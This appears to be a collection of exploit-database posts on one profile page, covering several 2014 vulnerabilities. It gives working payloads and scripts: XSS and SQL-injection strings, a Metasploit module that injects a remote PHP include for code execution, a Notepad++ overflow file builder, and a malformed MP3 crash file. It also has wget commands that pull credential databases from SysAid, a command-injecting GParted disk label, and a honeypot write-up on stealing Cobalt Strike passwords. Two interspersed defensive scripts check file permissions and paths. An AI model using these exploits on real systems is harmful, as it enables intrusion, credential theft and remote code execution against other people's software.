
Everything posted by HireHackking
-
GQ File Manager 0.2.5 - Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Exploit Title: GQ File Manager - SQL Injection - Cross Site Scripting Vulnerabilities
# Date: 19/12/2014
# Url Vendor: http://installatron.com/phpfilemanager
# Vendor Name: GQ File Manager
# Version: 0.2.5
# CVE: CVE-2014-1137
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

Description
GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.

------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description
- Create a new file, for example "xss.html", and insert the XSS code into the document.

Input:
"><img src=x onerror=;;alert('XSS') />

Output:
<br /> <b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />
"><img src=x onerror=alert("xss");>

#P0c
"><img src=x onerror=;;alert('XSS') />

#Proof Concept
http://i.imgur.com/cjIvR5l.jpg

------------------------
+ Sql Injection +
------------------------
# Exploiting Description
- SQL injection in the path used when creating a new file.

#P0c
http://site.com/GQFileManager/index.php?&&output=create&create=[sql]

#Proof Concept
http://i.imgur.com/IJZoDVt.jpg
-
Title: MySQL Honeypot Reads the Attacker's Computer Configuration Files

There are already far too many articles on the Internet about the specific technical details of MySQL honeypots; you can search for them yourself. A short introduction: MySQL has a LOAD DATA LOCAL INFILE feature that allows a local file to be read into the MySQL database. When an attacker uses a scanner that scans for MySQL and connects to it by brute-forcing the MySQL password (a correction here: simply connecting to the MySQL honeypot is enough for the honeypot to read local configuration files; a correct username and password are not required), the honeypot adds LOAD DATA LOCAL INFILE to the response packet sent to the client (the attacker), reads the attacker's local file into the database, and so achieves the goal of a countermeasure. (The following picture is from an Internet search.)

The CS configuration file stores the password in plain text

As long as the CS client is used to connect to a machine running the CS server, the CS client generates a .aggressor.prop configuration file in a fixed folder. On Windows the file is located at C:\Users\Administrator\.aggressor.prop. This configuration file contains the IP address, port, username and password of the CS team server, all in plain text! As shown in the figure below:

Every time CS is opened, it shows the IP address, port, username, password and other information of previous logins. This information is stored in the local .aggressor.prop file; its typical contents are shown in the figure below.

So I reached the following conclusion: build a MySQL honeypot. When an attacker connects to the honeypot, the honeypot uses the MySQL local file read vulnerability to automatically read the contents of C:\Users\Administrator\.aggressor.prop. The honeypot can then successfully obtain the attacker's CS server IP address, port, username and password.

Building the experimental environment

To verify the above guess, it has to be tested in practice. I found a MySQL honeypot script written in Python on GitHub, made a simple local modification changing the file read path to C:\Users\Administrator\.aggressor.prop, and ran the script. As shown in the figure below, a MySQL honeypot listening on local port 3306 has been built.

To simulate the behaviour of a red team member connecting to MySQL, I used Navicat to connect remotely to the honeypot's IP address. (To stress it once more: you do not need to know the MySQL username and password; enter a wrong username and password and the MySQL honeypot can still read local files.)

As shown in the figure below, the MySQL honeypot writes the Base64-encoded contents of the CS configuration file to a log file in the current directory. The result after Base64 decoding is as follows:

With the obtained IP address, port, username and password I was able to connect to the CS server (the following picture is from the Internet).

Under Windows, WeChat's default configuration file is placed under C:\Users\username\Documents\WeChat Files. Looking into it, you find that it contains C:\Users\username\Documents\WeChat Files\alues\config\config.data.
-
Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion',
      'Description'    => %q{
          This module exploits a local file inclusion vulnerability in the Lotus Mail
        Encryption Server (Protector for Mail Encryption) administration setup interface.
        The index.php file uses an unsafe include() where an unauthenticated remote user
        may read (traversal) arbitrary file contents. By abusing a second bug within
        Lotus, we can inject our payload into a known location and call it via the LFI
        to gain remote code execution. Version 2.1.0.1 Build(88.3.0.1.4323) is known to
        be vulnerable. You may need to set DATE in the format YYYY-MM-DD to get this
        working, where the remote host and metasploit instance have UTC timezone
        differences.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day
          #[ 'CVE', 'X' ],
          [ 'OSVDB', '87556'],
          #[ 'BID', 'X' ],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]],
      'DisclosureDate' => 'Nov 9 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(9000),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']),
      ], self.class)
  end

  def check
    res = send_request_cgi({ 'uri' => '/' })
    # guard against a nil response (connection failure) before touching res.code
    if (res && res.code == 302 && res.body.match(/GetLoginScreen.uevent/))
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def php_exploit
    logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d")

    if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore...
      print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.")
      return
    end

    # set up the initial log file RCE - this is unescaped ascii so we can execute it
    # later >:) uid is tomcat so we cannot read apache's logs, and we are stuck inside
    # tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the
    # filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick

    inject_url = "/omc/GetSetupScreen.event?setupPage=<?php+include+'#{php_include_url}';+?>" # no whitespace

    res = send_request_cgi({ 'uri' => inject_url })

    if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good.
      vprint_good("Payload injected...")
      response = send_request_cgi({
        'uri'    => '/omc/pme/index.php',
        'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php
      })
    end
  end
end
-
Notepad++ 6.6.9 - Buffer Overflow
#!/usr/bin/python
# Exploit Title: NotePad++ v6.6.9 Buffer Overflow
# URL Vendor: http://notepad-plus-plus.org/
# Vendor Name: NotePad
# Version: 6.6.9
# Date: 22/12/2014
# CVE: CVE-2014-1004
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Risk: Medium

#Description:
#Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
#Running in the MS Windows environment, its use is governed by GPL License.
#Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed
#and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon
#dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.

#Proof Concept
#http://i.imgur.com/TTDtxJM.jpg

#Code
import struct


def little_endian(address):
    # pack a 32-bit address as a little-endian DWORD
    return struct.pack("<L", address)


poc  = b"\x41" * 591                 # filler up to the overwritten record
poc += b"\xeb\x06\x90\x90"           # short jump forward (nSEH-style overwrite)
poc += little_endian(0x1004C31F)     # address placed over the handler
poc += b"\x90" * 80                  # NOP sled
poc += b"\x90" * (20000 - len(poc))  # pad the payload out to 20000 bytes

# '<?xml version="1.0" encoding="UTF-8" ?>\n<Schedule>\n\t<Event Url="" Time="http://\n' + poc
header  = b"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += b"\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += b"\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
# '" Folder="" />\n</Schedule>\n'
footer  = b"\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"

exploit = header + footer

filename = "notepad.xml"
# binary mode so the 0x0a bytes are written unchanged on Windows
with open(filename, "wb") as f:
    f.write(exploit)
-
BitRaider Streaming Client 1.3.3.4098 - Local Privilege Escalation
BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability

Vendor: BitRaider, LLC
Product web page: http://www.bitraider.com
Affected version: 1.3.3.4098

Summary: BitRaider is a video game streaming and download service.

Desc: BitRaider contains a flaw that leads to unauthorized privileges being gained. The issue is due to the program granting improper permissions with the 'F' flag for the 'Users' group, which makes the entire 'BitRaider' directory and its sub directories and files world-writable. This may allow a local attacker to change an executable file with a binary file and gain elevated privileges.

List of executables affected:

o====================================================================================================o
| Binary/location                                               | Description                        |
|                                                               |                                    |
|===============================================================|====================================|
| C:\ProgramData\BitRaider\BRSptStub.exe                        | BitRaider Support Stub             |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\common\BRException.exe               | BitRaider Exception Handler        |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\common\brwc.exe                      | BitRaider Distribution Web Client  |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRSptSvc.exe  | BitRaider Support Service Core     |
o====================================================================================================o

Tested on: Microsoft Windows 7 Professional SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5217
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5217.php

17.12.2014

----

C:\Users\user>sc qc BRSptStub
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BRSptStub
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\ProgramData\BitRaider\BRSptStub.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BitRaider Mini-Support Service Stub Loader
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\user>icacls "C:\ProgramData\BitRaider\BRSptStub.exe"
C:\ProgramData\BitRaider\BRSptStub.exe BUILTIN\Users:(F) <--------------------------
                                       NT AUTHORITY\SYSTEM:(F)
                                       NT AUTHORITY\Authenticated Users:(F) <-------
                                       BUILTIN\Administrators:(F)
                                       NT AUTHORITY\INTERACTIVE:(F) <---------------
                                       NT AUTHORITY\SERVICE:(F)
                                       BUILTIN\Guests:(RX)
                                       BUILTIN\Users:(I)(F) <-----------------------
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       NT AUTHORITY\Authenticated Users:(I)(F) <----
                                       BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\INTERACTIVE:(I)(F) <------------
                                       NT AUTHORITY\SERVICE:(I)(F)
                                       BUILTIN\Guests:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\user>
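The icacls listing above is the kind of evidence an auditor wants to check across every service binary, not just by eye. The following Python script is an added example, not part of the advisory or of BitRaider's software: it parses icacls output in the layout shown above (path on the first line followed by its first ACE, one ACE per indented line; paths containing spaces are an assumption left out of scope) and flags entries where a low-privilege principal holds a write-capable right. The sample output is constructed to mirror the advisory's listing without the arrow annotations; the set of principals and rights treated as risky is the author's choice and can be extended.

```python
import re

# Constructed sample in the format of the icacls output quoted in the advisory.
SAMPLE_ICACLS = """\
C:\\ProgramData\\BitRaider\\BRSptStub.exe BUILTIN\\Users:(F)
                                       NT AUTHORITY\\SYSTEM:(F)
                                       NT AUTHORITY\\Authenticated Users:(F)
                                       BUILTIN\\Administrators:(F)
                                       NT AUTHORITY\\INTERACTIVE:(F)
                                       BUILTIN\\Guests:(RX)
                                       BUILTIN\\Users:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that any local, non-admin user can act as (assumed list, extend as needed).
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
    "BUILTIN\\Guests",
    "Everyone",
}

# icacls right tokens that allow modifying or replacing the file (simple and specific rights).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "D", "DC"}

# "<principal>:(flag)(flag)..." where the principal itself may contain spaces.
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output):
    """Return a list of (path, principal, [flag groups]) tuples.

    Assumes the icacls layout: an unindented line carrying the path and the first
    ACE, then one indented line per further ACE. A path containing spaces would
    need a different split and is not handled here.
    """
    entries = []
    path = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed") or line.startswith("Failed"):
            continue
        if not raw.startswith(" "):
            # first line of a file: "<path> <principal>:<flags>"
            path, _, line = line.partition(" ")
        match = ACE_RE.match(line.strip())
        if match is None or path is None:
            continue
        principal = match.group("principal").strip()
        flags = re.findall(r"\(([^)]*)\)", match.group("flags"))
        entries.append((path, principal, flags))
    return entries


def weak_aces(output, low_priv=LOW_PRIV_PRINCIPALS):
    """Return (path, principal, [write rights]) for every ACE that grants a
    write-capable right to a low-privilege principal. Inheritance flags such as
    (I) or (OI)(CI) are ignored; comma-separated specific rights are split."""
    findings = []
    for path, principal, flags in parse_icacls(output):
        tokens = {token for group in flags for token in group.split(",")}
        risky = tokens & WRITE_RIGHTS
        if principal in low_priv and risky:
            findings.append((path, principal, sorted(risky)))
    return findings


if __name__ == "__main__":
    for path, principal, rights in weak_aces(SAMPLE_ICACLS):
        print(f"WRITABLE BY LOW-PRIV: {path}  {principal}  {rights}")
```

On a real host the text would come from `icacls <path>` run over each service binary path reported by `sc qc`; any finding against a binary that runs as LocalSystem is the condition the advisory describes.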
-
PHPMyRecipes 1.2.2 - 'browse.php?category' SQL Injection
##################################################################################################
#Exploit Title : phpMyRecipes 1.2.2 SQL injection (page browse.php, parameter category)
#Author : Manish Kishan Tanwar
#Download Link : http://prdownloads.sourceforge.net/php-myrecipes/phpMyRecipes-1.2.2.tar.gz?download
#Date : 23/12/2014
#Discovered at : IndiShell Lab
# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
# email : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
phpMyRecipes is a simple application for storing and retrieving recipes. It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is due to the parameter category in browse.php. The category parameter is passed to the function GetCategoryNameByID without data filtering, and because of that a SQL injection vulnerability arises.

from line 38 to 56

    $category = $_GET['category'];
}

$session = getsession();
c_header("Browse Recipes", "browse");

# Build a category string
$cat = $category;
$catstr = "";
while ($cat != 1) {
    if ($catstr == "") {
        $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) . "</A>" . $catstr;
    } else {
        $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) . "</A> > " . $catstr;
    }
    $cat = GetCategoryParentByID($cat);
}

////////////////
/// POC ////
///////////////
POC image=http://oi57.tinypic.com/inv3ol.jpg

Payload for extracting the database name: set the value of the category parameter to 1 and add an error-based SQL injection payload to the URL

http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################

--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)

--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
-
jetAudio 8.1.3 Basic (mp3) - Crash (PoC)
# Exploit Title : jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC
# Product : jetAudio Basic
# Date : 8.12.2014
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (fault.mp3) with jetAudio
# Details
# (1e764.1df98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9:
# 0aa6b8b9 8b4804          mov     ecx,dword ptr [eax+4] ds:002b:00000004=????????
# 0:000:x86> kb
# ChildEBP RetAddr  Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9
#============================================================================================
#!/usr/bin/python

# ID3v2 header ("ID3", version bytes, flags 0xC9, size 0), five "AENC" frames,
# then a malformed frame header followed by null padding and a trailing "TAG" block
pocdata = (b"\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

mp3file = "fault.mp3"
# binary mode so the raw bytes are written unchanged
with open(mp3file, "wb") as f:
    f.write(pocdata)
-
SysAid Server - Arbitrary File Disclosure
Vantage Point Security Advisory 2014-004
========================================

Title: SysAid Server Arbitrary File Disclosure
ID: VP-2014-004
Vendor: SysAid
Affected Product: SysAid On-Premise
Affected Versions: < 14.4.2
Product Website: http://www.sysaid.com/product/sysaid
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>

Summary:
---
SysAid Server is vulnerable to an unauthenticated file disclosure attack that allows an anonymous attacker to read arbitrary files on the system. An attacker exploiting this issue can compromise SysAid user accounts and gain access to important system files. When SysAid is configured to use LDAP authentication it is possible to gain read access to the entire Active Directory or obtain domain admin privileges.

Details:
---
How to download SysAid server database files containing usernames and password hashes (use any unauthenticated session ID):

wget -O "ilient.mdf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
  "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"

wget -O "ilient.ldf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
  "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"

The downloaded MSSQL files contain the LDAP user account and encrypted password used to access the Active Directory (SysAid encrypts the password with a static key that is the same for all instances of the software).

Fix Information:
---
Upgrade to version 14.4.2.

Timeline:
---
2014/11/14: Issue reported
2014/12/22: Patch available and installed by client

About Vantage Point Security:
---
Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.

Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg
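The root cause above is an endpoint that takes a file name from the request and opens it without confining it to the log directory it was written for. The Python function below is an added example, not code from the advisory or from SysAid: it shows the check such a handler needs, accepting only a bare file name, rejecting separators, drive letters and embedded NUL bytes, and resolving the result so that a symlink planted inside the directory cannot point outside it. The `demo()` scenario (a temporary log directory, one constructed log file, one file outside it and a symlink to it) is constructed for the example.

```python
import tempfile
from pathlib import Path


def resolve_log_file(base_dir, requested_name):
    """Return the resolved Path of requested_name inside base_dir, or None when the
    request must be refused. Only bare file names are accepted: the endpoint serves
    files from one directory, so any path syntax at all is a reason to refuse."""
    base = Path(base_dir).resolve()
    if not requested_name or "\x00" in requested_name:
        return None  # empty or NUL-truncation attempt
    if any(sep in requested_name for sep in ("/", "\\", ":")) or requested_name in (".", ".."):
        return None  # traversal, absolute path or Windows drive prefix
    candidate = (base / requested_name).resolve()
    # resolve() follows symlinks, so a link inside base that points elsewhere ends up
    # with a different parent and is refused here.
    if candidate.parent != base:
        return None
    return candidate


def demo():
    """Constructed scenario. Returns {request: accepted} for a set of sample requests."""
    with tempfile.TemporaryDirectory() as tmp:
        logs = Path(tmp) / "logs"
        logs.mkdir()
        (logs / "omf-2014-12-22.log").write_text("constructed log line\n")
        outside = Path(tmp) / "secret.mdf"
        outside.write_text("constructed database contents\n")

        requests = [
            "omf-2014-12-22.log",                # the only legitimate shape
            "../secret.mdf",                     # classic traversal
            "c:\\\\Program+Files\\\\ilient.mdf",  # drive-letter form from the advisory
            "omf-2014-12-22.log\x00.txt",        # NUL truncation
        ]
        try:
            (logs / "escape.log").symlink_to(outside)
            requests.append("escape.log")        # symlink pointing outside base
        except OSError:
            pass  # platform without symlink support; skip that case

        return {r: resolve_log_file(logs, r) is not None for r in requests}


if __name__ == "__main__":
    for request, accepted in demo().items():
        print(f"{'ACCEPT' if accepted else 'REFUSE'}  {request!r}")
```

The two-layer shape matters: the syntactic check stops every request that contains path syntax, and the post-resolution parent comparison catches what syntax checks cannot see, such as a symlink already sitting in the directory.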
-
GParted 0.14.1 - OS Command Execution
SEC Consult Vulnerability Lab Security Advisory < 20141218-1 >
=======================================================================
              title: OS Command Execution
            product: GParted - Gnome Partition Editor
 vulnerable version: <=0.14.1
      fixed version: >=0.15.0, <=0.14.1 with fix for CVE-2014-7208 applied
         CVE number: CVE-2014-7208
             impact: medium
           homepage: http://gparted.org/
              found: 2014-07
                 by: W. Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"GParted is a free partition editor for graphically managing your disk
partitions. With GParted you can resize, copy, and move partitions without
data loss, enabling you to:
  * Grow or shrink your C: drive
  * Create space for new operating systems
  * Attempt data rescue from lost partitions"

URL: http://gparted.org/index.php

Vulnerability overview/description:
-----------------------------------
Gparted <=0.14.1 does not properly sanitize strings before passing them as
parameters to an OS command. Those commands are executed using root
privileges.

Parameters that are being used for OS commands in Gparted are normally
determined by the user (e.g. disk labels, mount points). However, under
certain circumstances, an attacker can use an external storage device to
inject command parameters. These circumstances are met if for example an
automounter uses a filesystem label as part of the mount path.

Please note that GParted versions before 0.15 are still being used in
distributions. E.g. Debian Wheezy is vulnerable to this issue before applying
the patches.

Proof of concept:
-----------------
The following command creates a malicious filesystem.

# mkfs.ext2 -L "\`reboot\`" /dev/sdXX

When this filesystem is mounted by an automounter to a mountpoint containing
the filesystem label and the user tries to unmount this filesystem using
GParted, the system reboots.

Vulnerable / tested versions:
-----------------------------
Gparted versions <=0.14.1 were found to be vulnerable.

Vendor contact timeline:
------------------------
2014-10-29: Contacting maintainer (Curtis Gedak) through gedakc AT users DOT sf DOT net
2014-10-29: Initial response from maintainer offering encryption
2014-10-30: Sending encrypted advisory
2014-10-30: Maintainer confirms the behaviour, will be investigated further
2014-11-04: Maintainer sends initial patches
2014-11-05: Giving a few notes on the patches
2014-11-05: Maintainer clarifies a few concerns with the patches; Forwards patches to Mike Fleetwood for review
2014-11-08: Review shows that the patches cause functional problems; proposes further procedure
2014-11-08: Maintainer proposes a different patching approach
2014-11-08: Reviewer shows concerns with this approach, opens a security bug (1171909) with Fedora (in accordance with their Security Tracking Bugs procedure); Red Hat creates tracking bug 1172549
2014-11-15: New patches for several versions
2014-11-23: Maintainer sends vulnerability information to Debian
2014-11-29: Debian Security Team responds, asks for embargo date and CVE number
2014-11-30: Release date set to 2014-12-18
2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed
2014-12-11: Writing that embargo may be lifted, SEC Consult will release advisory on 2014-12-18
2014-12-18: Coordinated release of security advisory

Solution:
---------
Update GParted to version >= 0.15.0 or apply security patches for CVE-2014-7208.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF W. Ettlinger / @2014
